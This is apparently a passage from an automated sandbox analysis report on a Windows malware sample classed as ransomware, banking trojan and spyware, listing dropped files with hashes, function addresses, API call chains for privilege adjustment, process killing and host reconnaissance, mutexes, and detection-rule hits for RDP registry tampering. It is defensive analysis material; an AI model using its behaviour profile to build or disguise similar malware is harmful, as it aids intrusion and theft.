                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C2D62E86_2_6C2D62E8
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C3142E16_2_6C3142E1
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C2DF32A6_2_6C2DF32A
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C2E83686_2_6C2E8368
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C2763746_2_6C276374
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C2DE35C6_2_6C2DE35C
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C2DC38C6_2_6C2DC38C
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C2AA3866_2_6C2AA386
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C3193C96_2_6C3193C9
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_032F20516_2_032F2051
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_0332A3586_2_0332A358
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_032F43846_2_032F4384
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_032F62946_2_032F6294
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_033011246_2_03301124
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_0332E16D6_2_0332E16D
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_032F51946_2_032F5194
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_0333207A6_2_0333207A
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_032FC0B46_2_032FC0B4
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_0334D0E86_2_0334D0E8
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_033357A66_2_033357A6
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_033377A46_2_033377A4
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_032FA6F46_2_032FA6F4
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_0332E6EF6_2_0332E6EF
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_0332E4346_2_0332E434
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_033144746_2_03314474
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_032F34446_2_032F3444
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_033254C46_2_033254C4
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_0332DB516_2_0332DB51
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_0334EBE16_2_0334EBE1
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_0332DAA46_2_0332DAA4
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_032F9AC46_2_032F9AC4
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_033529226_2_03352922
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_033279C46_2_033279C4
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_032F68146_2_032F6814
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_032F48746_2_032F4874
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_033458EE6_2_033458EE
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_03331E466_2_03331E46
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_032F6EA46_2_032F6EA4
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_0332DEC36_2_0332DEC3
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_0334ED056_2_0334ED05
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_03331C126_2_03331C12
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_032F4CE46_2_032F4CE4
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_1000F1006_2_1000F100
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_100400566_2_10040056
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_1000A0906_2_1000A090
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_1005B0C46_2_1005B0C4
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_1003C1496_2_1003C149
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_100031706_2_10003170
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_100042706_2_10004270
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_100383346_2_10038334
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_100023606_2_10002360
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_1003C4106_2_1003C410
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_100014206_2_10001420
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_100224506_2_10022450
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_100334A06_2_100334A0
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_1003C6CB6_2_1003C6CB
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_100086D06_2_100086D0
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_100457806_2_10045780
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_100437826_2_10043782
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_100047F06_2_100047F0
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_100028506_2_10002850
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_100538CA6_2_100538CA
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_100608FE6_2_100608FE
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_100359A06_2_100359A0
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_1003BA806_2_1003BA80
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_10007AA06_2_10007AA0
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_1003BB2D6_2_1003BB2D
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_1005CBBD6_2_1005CBBD
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_1003FBEE6_2_1003FBEE
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_10002CC06_2_10002CC0
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_1005CCE16_2_1005CCE1
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_1003FE226_2_1003FE22
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_10004E806_2_10004E80
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_1003BE9F6_2_1003BE9F
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C2B58357_2_6C2B5835
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C2711127_2_6C271112
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C311CD17_2_6C311CD1
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C2F9CC57_2_6C2F9CC5
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C279CCA7_2_6C279CCA
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C28CD327_2_6C28CD32
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C301D127_2_6C301D12
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C2D9D7B7_2_6C2D9D7B
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C2EBD487_2_6C2EBD48
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C306D467_2_6C306D46
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C2CDD8F7_2_6C2CDD8F
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C2CEDF57_2_6C2CEDF5
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C2BBDD07_2_6C2BBDD0
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C2E9E127_2_6C2E9E12
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C278E607_2_6C278E60
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C318E6E7_2_6C318E6E
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C2E3E4C7_2_6C2E3E4C
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C28AED77_2_6C28AED7
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C307F377_2_6C307F37
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C28DF3F7_2_6C28DF3F
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C28BFD77_2_6C28BFD7
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C28387C7_2_6C28387C
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C3119337_2_6C311933
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C3129707_2_6C312970
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C2969737_2_6C296973
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C2F59907_2_6C2F5990
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C2F99C67_2_6C2F99C6
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C2B09DA7_2_6C2B09DA
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C2FCAA57_2_6C2FCAA5
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C287BAA7_2_6C287BAA
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C285BBD7_2_6C285BBD
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C27EBF47_2_6C27EBF4
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C2E0BCC7_2_6C2E0BCC
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C3114227_2_6C311422
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C27B41A7_2_6C27B41A
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C31149E7_2_6C31149E
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C31248B7_2_6C31248B
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C30B5037_2_6C30B503
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C2845447_2_6C284544
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C2A05B37_2_6C2A05B3
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C2BB5D77_2_6C2BB5D7
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C2E86B77_2_6C2E86B7
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C2B86897_2_6C2B8689
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C2856987_2_6C285698
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C2E46987_2_6C2E4698
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C2EF6C97_2_6C2EF6C9
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C2BD7687_2_6C2BD768
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C2F974B7_2_6C2F974B
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C3067F57_2_6C3067F5
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C2E20257_2_6C2E2025
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C2E70037_2_6C2E7003
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C2DB07C7_2_6C2DB07C
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C3120A37_2_6C3120A3
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C29E0D87_2_6C29E0D8
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C2CA1927_2_6C2CA192
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C27E1C87_2_6C27E1C8
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C2F026A7_2_6C2F026A
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C2D32667_2_6C2D3266
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C2782797_2_6C278279
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C3062A67_2_6C3062A6
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C2882B27_2_6C2882B2
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C2D62E87_2_6C2D62E8
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C3142E17_2_6C3142E1
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C2DF32A7_2_6C2DF32A
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C2E83687_2_6C2E8368
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C2763747_2_6C276374
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C2DE35C7_2_6C2DE35C
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C2DC38C7_2_6C2DC38C
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C2AA3867_2_6C2AA386
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C3193C97_2_6C3193C9
                Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\90m3FHO\33MwVPy.exe E528455778D952ACFC5B330B378F2C53CC92E55CFEAB1C1E1DBB52E01D626BB4
                Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\90m3FHO\MSVCP140.dll 885A0A146A83B0D5A19B88C4EB6372B648CFAED817BD31D8CD3FB91313DEA13D
                Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\90m3FHO\VCRUNTIME140.dll F10727074BCB4375F276E48DA64029D370299768536157321FB4BD9B1997B898
                Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\90m3FHO\libcef.dll DCD188D383CB6347BFED0F4E6209ABD579526E729B003C31C3A8B117C1475AF6
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeCode function: String function: 00641D20 appears 41 times
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeCode function: String function: 00641A4F appears 105 times
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeCode function: String function: 006389E3 appears 37 times
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: String function: 6C27C822 appears 40 times
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: String function: 6C2F9165 appears 42 times
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: String function: 6C2F7ECE appears 72 times
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: String function: 6C27CB4D appears 878 times
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: String function: 6C2F3864 appears 346 times
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: String function: 0332BAE4 appears 58 times
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: String function: 6C2F1F84 appears 940 times
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: String function: 10039AC0 appears 60 times
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: String function: 6C2F23D3 appears 38 times
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: String function: 6C309148 appears 46 times
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: String function: 6C2F7820 appears 148 times
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: String function: 6C292962 appears 66 times
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: String function: 6C2914FC appears 136 times
                Source: Rudvfa0Z17.exe, 00000000.00000002.3261089885.0000000003BF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs Rudvfa0Z17.exe
                Source: Rudvfa0Z17.exe, 00000000.00000002.3261125914.0000000003C08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs Rudvfa0Z17.exe
                Source: Rudvfa0Z17.exe, 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameJumpLogin.exe( vs Rudvfa0Z17.exe
                Source: Rudvfa0Z17.exe, 00000000.00000003.3084197198.0000000003C01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsvcp140.dllT vs Rudvfa0Z17.exe
                Source: Rudvfa0Z17.exe, 00000000.00000003.3086940725.0000000003C08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs Rudvfa0Z17.exe
                Source: Rudvfa0Z17.exeBinary or memory string: OriginalFilenameJumpLogin.exe( vs Rudvfa0Z17.exe
                Source: Rudvfa0Z17.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 6.2.33MwVPy.exe.3258c24.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_RDP author = ditekSHen, description = Detects executables embedding registry key / value combination manipulating RDP / Terminal Services
                Source: 6.2.33MwVPy.exe.32f2c24.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_RDP author = ditekSHen, description = Detects executables embedding registry key / value combination manipulating RDP / Terminal Services
                Source: 6.2.33MwVPy.exe.3258c24.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_RDP author = ditekSHen, description = Detects executables embedding registry key / value combination manipulating RDP / Terminal Services
                Source: 6.2.33MwVPy.exe.32f2c24.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_RDP author = ditekSHen, description = Detects executables embedding registry key / value combination manipulating RDP / Terminal Services
                Source: classification engineClassification label: mal100.rans.bank.troj.spyw.evad.winEXE@6/8@4/3
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_0330BF74 GetProcessHeap,RtlAllocateHeap,VirtualAlloc,VirtualAlloc,VirtualFree,VirtualProtect,GetLastError,FormatMessageW,LocalAlloc,OutputDebugStringA,6_2_0330BF74
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeCode function: 0_2_026D18EE OpenProcess,OpenProcessToken,CloseHandle,AdjustTokenPrivileges,GetLengthSid,SetTokenInformation,OpenProcess,OpenProcessToken,CloseHandle,AdjustTokenPrivileges,GetLengthSid,SetTokenInformation,OpenProcess,OpenProcessToken,CloseHandle,AdjustTokenPrivileges,GetLengthSid,SetTokenInformation,OpenProcess,OpenProcessToken,CloseHandle,AdjustTokenPrivileges,GetLengthSid,SetTokenInformation,0_2_026D18EE
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeCode function: 0_2_026D18A4 AdjustTokenPrivileges,0_2_026D18A4
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeCode function: 0_2_026D1776 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,CloseHandle,AdjustTokenPrivileges,0_2_026D1776
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeCode function: 0_2_100018A0 AdjustTokenPrivileges,0_2_100018A0
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeCode function: 0_2_100018EA OpenProcess,OpenProcessToken,CloseHandle,AdjustTokenPrivileges,GetLengthSid,SetTokenInformation,OpenProcess,OpenProcessToken,CloseHandle,AdjustTokenPrivileges,GetLengthSid,SetTokenInformation,OpenProcess,OpenProcessToken,CloseHandle,AdjustTokenPrivileges,GetLengthSid,SetTokenInformation,OpenProcess,OpenProcessToken,CloseHandle,AdjustTokenPrivileges,GetLengthSid,SetTokenInformation,0_2_100018EA
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeCode function: 0_2_10001772 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,CloseHandle,AdjustTokenPrivileges,0_2_10001772
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_03319554 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,CreateToolhelp32Snapshot,LocalAlloc,Process32First,OpenProcess,K32EnumProcessModules,K32GetProcessImageFileNameA,lstrcpy,lstrcat,OpenProcessToken,GetTokenInformation,GlobalAlloc,GetTokenInformation,LookupAccountSidA,LookupAccountSidA,lstrcpy,GlobalFree,CloseHandle,lstrcpy,lstrlen,lstrlen,LocalSize,LocalReAlloc,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,K32GetProcessMemoryInfo,lstrcpy,CreateFileA,GetFileSize,CloseHandle,CloseHandle,Process32Next,LocalReAlloc,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,6_2_03319554
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_03319FC4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,OpenProcess,K32GetProcessImageFileNameA,CloseHandle,OpenProcess,TerminateProcess,lstrlen,Sleep,DeleteFileA,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,Sleep,EnumWindows,6_2_03319FC4
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_10027530 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,CreateToolhelp32Snapshot,LocalAlloc,Process32First,OpenProcess,K32EnumProcessModules,K32GetProcessImageFileNameA,lstrcpy,lstrcat,OpenProcessToken,GetTokenInformation,GlobalAlloc,GetTokenInformation,LookupAccountSidA,LookupAccountSidA,lstrcpy,GlobalFree,CloseHandle,lstrcpy,lstrlen,lstrlen,LocalSize,LocalReAlloc,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,K32GetProcessMemoryInfo,lstrcpy,CreateFileA,GetFileSize,CloseHandle,CloseHandle,Process32Next,LocalReAlloc,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,6_2_10027530
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_10027FA0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,OpenProcess,K32GetProcessImageFileNameA,CloseHandle,OpenProcess,TerminateProcess,lstrlen,Sleep,DeleteFileA,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,Sleep,EnumWindows,6_2_10027FA0
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_033254C4 RegOpenKeyExA,RegCloseKey,GetTickCount,gethostname,GetUserNameA,GetLastError,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,lstrcpy,lstrlen,OpenSCManagerA,wsprintfA,OpenServiceA,QueryServiceStatus,wsprintfA,lstrlen,GetModuleFileNameA,SHGetSpecialFolderPathA,FindFirstFileA,FindNextFileA,FindNextFileA,FindNextFileA,EnumDisplaySettingsA,_strftime,OpenSCManagerA,QueryServiceStatus,OpenSCManagerA,QueryServiceStatus,GetLocaleInfoW,WideCharToMultiByte,WideCharToMultiByte,6_2_033254C4
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeCode function: 0_2_00428B10 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,0_2_00428B10
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C2D23D0 CoCreateInstance,GetModuleFileNameA,_sprintf,_sprintf,_sprintf,MultiByteToWideChar,6_2_6C2D23D0
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeCode function: 0_2_005390CF __EH_prolog3_catch,FindResourceW,LoadResource,LockResource,GetDesktopWindow,IsWindowEnabled,EnableWindow,EnableWindow,GetActiveWindow,SetActiveWindow,FreeResource,0_2_005390CF
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_0331CA82 StartServiceA,CloseServiceHandle,CloseServiceHandle,Sleep,lstrlen,LocalSize,lstrlen,LocalReAlloc,lstrlen,lstrlen,lstrlen,LocalFree,6_2_0331CA82
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeFile created: C:\Program Files (x86)\90m3FHOJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\long[1].bmpJump to behavior
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeMutant created: \Sessions\1\BaseNamedObjects\4246/:/49"7<5
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeMutant created: \Sessions\1\BaseNamedObjects\MyProgramMutex
                Source: C:\Windows\System32\OpenWith.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4720:120:WilError_03
                Source: Rudvfa0Z17.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: Rudvfa0Z17.exeReversingLabs: Detection: 28%
                Source: Rudvfa0Z17.exeVirustotal: Detection: 46%
                Source: 33MwVPy.exeString found in binary or memory: <!--StartFragment -->
                Source: 33MwVPy.exeString found in binary or memory: <!--StartFragment -->
                Source: 33MwVPy.exeString found in binary or memory: <!--StartFragment -->
                Source: 33MwVPy.exeString found in binary or memory: <!--StartFragment -->
                Source: Rudvfa0Z17.exeString found in binary or memory: AddDllDirectory\/LoadLibraryExAkernel32multi Rh
                Source: Rudvfa0Z17.exeString found in binary or memory: set-addPolicy
                Source: Rudvfa0Z17.exeString found in binary or memory: id-cmc-addExtensions
                Source: unknownProcess created: C:\Users\user\Desktop\Rudvfa0Z17.exe "C:\Users\user\Desktop\Rudvfa0Z17.exe"
                Source: unknownProcess created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe -Embedding
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeProcess created: C:\Program Files (x86)\90m3FHO\33MwVPy.exe "C:\Program Files (x86)\90m3FHO\33MwVPy.exe"
                Source: unknownProcess created: C:\Program Files (x86)\90m3FHO\33MwVPy.exe "C:\Program Files (x86)\90m3FHO\33MwVPy.exe"
                Source: unknownProcess created: C:\Program Files (x86)\90m3FHO\33MwVPy.exe "C:\Program Files (x86)\90m3FHO\33MwVPy.exe"
